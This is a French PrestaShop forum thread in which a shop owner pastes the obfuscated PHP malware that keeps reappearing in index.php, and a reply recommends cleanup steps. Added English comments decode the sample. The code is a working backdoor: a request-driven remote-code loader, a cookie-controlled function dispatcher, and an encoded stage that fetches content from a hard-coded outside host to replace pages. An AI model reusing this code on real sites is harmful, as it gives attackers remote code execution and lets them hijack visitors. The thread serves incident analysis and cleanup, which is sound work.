master pity Posted March 30, 2021 Share Posted March 30, 2021 Bonjour à toutes et à tous. Depuis quelques temps j'ai du code qui revient automatiquement dans mon fichier index.php (voir ci-dessous). J'ai tenté pas mal de choses mais rien y fait il revient toujours ! Je supprime donc régulièrement le fichier et remet le fichier non-corrompu mais au bout d'1/2h en moyenne ça revient ! Si quelqu'un à une idée ? Configuration : Prestashop : 1.6.1.24 Version du logiciel serveur Apache Version de PHP 5.6.40 Limite de mémoire 64M Version de MySQL 5.1.41 <?php
// NOTE(review): everything between the PHP open and close tags is the injected, obfuscated code the
// poster found in index.php. It combines three independent mechanisms:
//   1. a GET-parameter-driven loader that downloads a payload and runs it via create_function();
//   2. a cookie-driven dispatcher that calls functions whose names come from the request cookies;
//   3. Lnlzud(), which decodes an embedded hex blob into PHP source and runs it on every request.
// All three depend on create_function(), which was deprecated in PHP 7.2 and removed in PHP 8.0.
// Nothing visible here writes to index.php, so the re-injection described in the post presumably
// comes from code delivered through one of these channels or from another planted file; confirm by
// diffing the whole tree against a clean release and reviewing the access logs.
// Strings that appear literally below and are usable as search patterns across the site tree:
//   "bas"."e64_d"."ecode"   ${chr(95).chr(71).chr(69).chr(84)}   Y3JlYXRlX2Z1bmN0aW9u   pack('H*',

// Opens the PHP session; used further down to keep the attacker-supplied configuration between requests.
session_start();
// Hides every error and removes the execution time limit, so failures leave no trace in the page.
error_reporting(0);set_time_limit(0);
@ini_set('display_errors','Off');
@ini_set('memory_limit','256M');

// Function names are built from fragments so that a plain-text search for them finds nothing.
// This concatenation yields "base64_decode".
$dvtApVWcGU = "bas"."e64_d"."ecode";
// base64_decode("c3RyX3JvdDEz") yields "str_rot13".
$tzPmK=$dvtApVWcGU("c3Ry"."X3Jv"."dDEz");
// Lookup table of decoded names and fragments (ROT13 / chr() decoded by hand):
//   [0] "ARRAY"   [1] "create_function"   [2] "json_decode"   [3] "base64_decode"
//   [4] "}"       [5] "/*"                [6] "pack"          [7] "H*"
//   [8] "str_rot13"
//   [9] the value of $_GET["ARRAY"] -- untrusted request input
$efoGx = array(
    $tzPmK("NE"."ENL"),
    $tzPmK("per"."ngr_"."shapgvba"),
    $tzPmK("wfb"."a_qr"."pbqr"),
    $dvtApVWcGU,chr(125),chr(47).chr(42),$tzPmK("cn"."px"),
    $tzPmK("U").chr(42),$tzPmK,
    ${chr(95).chr(71).chr(69).chr(84)}[chr(65).chr(82).chr(82).chr(65).chr(89)]);

// Decoding chain applied to the GET parameter: str_rot13 -> pack("H*") -> json_decode(..., true).
$dvtApVWcGU = $efoGx[8]($efoGx[9]);
$dvtApVWcGU = $efoGx[6]($efoGx[7],$dvtApVWcGU);
$dvtApVWcGU = $efoGx[2]($dvtApVWcGU,true);
// A successfully decoded value is stored in $_SESSION["ARRAY"], so later requests in the same
// session reuse it without resending the parameter.
($dvtApVWcGU)&&$_SESSION[$efoGx[0]]=$dvtApVWcGU;
$PtQTnsqEvm=$_SESSION[$efoGx[0]];
// Element 1 of the stored array is passed to cSToy() as a URL; the response body is kept.
$YHnfPeapJ=cSToy($PtQTnsqEvm[1]);
// Element 0 is compared with time(): while it lies in the future, the downloaded body is
// base64-decoded and handed to create_function() wrapped as "}" . payload . "/*". The leading brace
// closes the generated function body, so the payload is presumably evaluated at creation time
// rather than when the lambda is called. Net effect: remote code execution for whoever controls
// the GET parameter. Access-log requests carrying an "ARRAY" query parameter are the trace to look for.
(($PtQTnsqEvm[0]-time())>0)&&@$efoGx[1]("", $efoGx[4].$efoGx[3]($YHnfPeapJ).$efoGx[5]);

// Downloads $zvEhFA with cURL (60 s timeout, body returned as a string); when that yields nothing,
// it retries with file_get_contents(). The URL is whatever the session array supplied above.
function cSToy($zvEhFA) {
    $nvGrc = curl_init();
    curl_setopt($nvGrc, CURLOPT_TIMEOUT, 60);
    curl_setopt($nvGrc, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($nvGrc, CURLOPT_URL, $zvEhFA);
    $jXFuGq = curl_exec ($nvGrc);
    if(empty($jXFuGq)) $jXFuGq = @file_get_contents($zvEhFA);
    return $jXFuGq;
}

// Cookie-driven dispatcher. It runs when the request carries exactly 23 cookies. The md5(...) value
// and the hex string are joined with && instead of being compared, so they are always truthy and
// restrict nothing: the cookie count is the only gate. Cookies 70 and 78 are concatenated into a
// function name, cookie 81 is transformed by that function into a second function name, and the
// result of calling it with cookie 52 and further cookie-selected data is then invoked. Every
// callable and argument is request-controlled, so this is a second arbitrary-code-execution path.
// Requests with an unusually large set of numerically named cookies are the trace to look for.
$IcaW=$_COOKIE;
@((count($IcaW)==23&&md5(md5(gettype($IcaW).count($IcaW)))&&"b542e7dc8088fef2de66ac2aa7369260"))?(($IcaW[70]=$IcaW[70].$IcaW[78])&&($IcaW[81]=$IcaW[70]($IcaW[81]))&&(@$IcaW=$IcaW[81]($IcaW[52],$IcaW[70](${$IcaW[38]}[i])))&&$IcaW()):$IcaW;

// Embedded stage: the string below is PHP source stored as hex digits with ROT13 applied on top
// (n-s stand for a-f). Decoded by hand -- verify with an offline decoder, never by running it --
// the source defines four helpers and a dispatcher that:
//   - split the request path after SCRIPT_NAME into segments;
//   - build a callback URL containing base64(json([REMOTE_ADDR, HTTP_USER_AGENT, HTTP_REFERER]));
//   - fetch from a hard-coded host (decodes to http://4.tops-mall[.]com/) with cURL, with
//     CURLOPT_SSL_VERIFYHOST and CURLOPT_SSL_VERIFYPEER set to 0, falling back to
//     file_get_contents() with an MSIE 6.0 user agent;
//   - pick a query type ("page", "has", "xml", "jk") from the first path segment, and when the
//     remote answer is non-empty, send it with exit(), replacing the shop's own page (one case
//     sets "Content-type: text/xml").
// This is consistent with remotely controlled content injection / cloaking: the remote host
// decides per visitor what the shop serves. Outbound requests to that host are an indicator.
function Lnlzud(){
    $HCcPemBpKhAtLGxR = 
'66756r6374696s6r204158776q52615548767n6s685428246r756q297o0q0n092475726p203q20617272617928293o0q0n092475726p203q207472696q287374725s7265706p61636528245s5345525645525o225343524950545s4r414q45225q2p2022222p20245s5345525645525o22524551554553545s555249225q292p20222s22293o0q0n092475726p203q206578706p6s646528222s222p202475726p293o0q0n0972657475726r202475726p5o246r756q2q315q3o0q0n7q0q0n66756r6374696s6r206661464o72637153526s6q4p28297o0q0n0924687474705s686s7374203q20737472746s6p6s77657228245s5345525645525o22485454505s484s5354225q293o0q0n0924736563757265203q2028697373657428245s5345525645525o224854545053225q2920262620245s5345525645525o224854545053225q203q3q20226s6r2229203s2031203n20303o0q0n0924617272203q20617272617928245s5345525645525o2252454q4s54455s41444452225q2p245s5345525645525o22485454505s555345525s4147454r54225q2p245s5345525645525o22485454505s52454645524552225q293o0q0n09246n736s6r203q20225o7p5q222r6261736536345s656r636s6465286n736s6r5s656r636s6465282461727229293o0q0n0972657475726r202824736563757265203s202268747470733n2s2s22203n2022687474703n2s2s2229202r2024687474705s686s73742r245s5345525645525o225343524950545s4r414q45225q2r246n736s6r3o0q0n7q0q0n66756r6374696s6r2044506q625242574r46646n7n545n43282475726p297o0q0n0924726573756p74203q2027273o0q0n0969662866756r6374696s6r5s65786973747328276375726p5s696r69742729297o0q0n09097472797o0q0n090909246368203q206375726p5s696r697428293o0q0n090909246s75745s74696q65203q2033303o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s55524p2p2475726p293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s53534p5s564552494659484s53542p2030293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s53534p5s564552494659504545522p2030293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s52455455524r5452414r534645522p31293o0q0n0909096375726p5s7365746s7074282463682p4355524p4s50545s434s4r4r45435454494q454s55542p3630293o0q0n09090924726573756p74203q206375726p5s6578656328246368293o0q0n0909096375726p5s636p6s736528246368293o0q0n09097q0
q0n090963617463682028457863657074696s6r202465297o0q0n09097q0q0n097q0q0n096966287374726p656r2824726573756p74293p31262666756r6374696s6r5s657869737473282766696p655s6765745s636s6r74656r74732729297o0q0n0909696r695s7365742827757365725s6167656r74272p274q6s7n696p6p612s342r302028636s6q70617469626p653o4q53494520362r303o57696r646s7773204r5420352r323o2r4r455420434p5220312r312r343332322927293o0q0n09097472797o0q0n09090924726573756p74203q204066696p655s6765745s636s6r74656r7473282475726p293o0q0n09097q0q0n090963617463682028457863657074696s6r202465297o0q0n09097q0q0n097q0q0n0972657475726r2024726573756p743o0q0n7q0q0n0q0n66756r6374696s6r204o586p5n4r7574534954675645507752645128246r756q297o0q0n2475726p203q2022687474703n2s2s342r746s70732q6q616p6p2r636s6q2s223o0q0n092464617461203q206172726179280q0n09617272617928226p63223q3r2270616765222p202270616765223q3r4158776q52615548767n6s68542831292p2275726p223q3r6661464o72637153526s6q4p2829292p200q0n09617272617928226p63223q3r22686173222p20226964223q3r4158776q52615548767n6s68542832292p2275726p223q3r6661464o72637153526s6q4p2829292p200q0n09617272617928226p63223q3r22786q6p222p202270616765223q3r4158776q52615548767n6s68542832292p202275726p223q3r6661464o72637153526s6q4p2829292p200q0n09617272617928226p63223q3r226n6o222p202275726p223q3r6661464o72637153526s6q4p2829292p200q0n09293o0q0n092475726p203q202475726p2r223s222r687474705s6275696p645s71756572792824646174615o246r756q5q293o0q0n092466203q2044506q625242574r46646n7n545n43282475726p293o0q0n09696628246r756q3q3q32296865616465722822436s6r74656r742q747970653n20746578742s786q6p22293o0q0n0921656q707479282466293s65786974282466293n22223o0q0n7q0q0n24685s75726p203q206661464o72637153526s6q4p28293o0q0n2470615s75726p203q2070617273655s75726p2824685s75726p293o0q0n2468203q202470615s75726p5o22686s7374225q3o0q0n24797375203q207374725s7265706p61636528617272617928222s222p222r222p222q22292p22222p2468293o0q0n2475203q204158776q52615548767n6s68542831293o0q0n7377697463682028247529207o0q0n096361736520247973753n204o586p5n4r75745349546756455
0775264512831293o627265616o3o0q0n09636173652022786q6p223n204o586p5n4r757453495467564550775264512832293o627265616o3o0q0n096361736520226n6o223n204o586p5n4r757453495467564550775264512833293o627265616o3o0q0n0964656661756p743n204o586p5n4r757453495467564550775264512830293o0q0n7q0q0n';
    // ROT13 turns the n-s letters back into the hex digits a-f.
    $HCcPemBpKhAtLGxR = str_rot13($HCcPemBpKhAtLGxR);
    // base64_decode("Y3JlYXRlX2Z1bmN0aW9u") yields "create_function".
    $inCXEsoVYuFtQLmDyZWJ=base64_decode("Y3JlYXRlX2Z1bmN0aW9u");
    // pack('H*', ...) converts the hex digits to PHP source, which becomes the body of an anonymous
    // function; the @ hides any warning raised while it is compiled.
    $agbqJwZrThcnoGVzFHR=@$inCXEsoVYuFtQLmDyZWJ('',pack('H*',$HCcPemBpKhAtLGxR));
    // Runs the decoded stage.
    $agbqJwZrThcnoGVzFHR();
}
// Called unconditionally, so the embedded stage runs on every request that reaches this index.php.
Lnlzud();
?> Link to comment Share on other sites More sharing options...
Eolia Posted March 30, 2021 Share Posted March 30, 2021 Effectuer un nettoyage complet de votre site (fichiers ajoutés, modifiés, modules non-secure) Link to comment Share on other sites More sharing options...
master pity Posted March 30, 2021 Author Share Posted March 30, 2021 25 minutes ago, Eolia said: Effectuer un nettoyage complet de votre site (fichiers ajoutés, modifiés, modules non-secure) Merci de votre réponse ! Avec quelle méthode préconisez-vous ce nettoyage ? Link to comment Share on other sites More sharing options...
Eolia Posted March 30, 2021 Share Posted March 30, 2021 - Diff (comparer fichiers originaux et ceux du site) - scripts avec recherche de caractères/fonctions spécifiques - Analyse des modules connus comme étant suspects https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque - Analyse des logs d'erreurs Prestashop - Analyse des logs serveur (access & error) Link to comment Share on other sites More sharing options...
master pity Posted March 30, 2021 Author Share Posted March 30, 2021 Merci j'ai déjà fait le Diff je vais regarder les modules de ton lien ! Link to comment Share on other sites More sharing options...